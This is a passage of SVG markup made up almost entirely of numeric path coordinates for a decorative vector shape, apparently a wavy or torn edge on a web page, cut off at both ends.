4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path 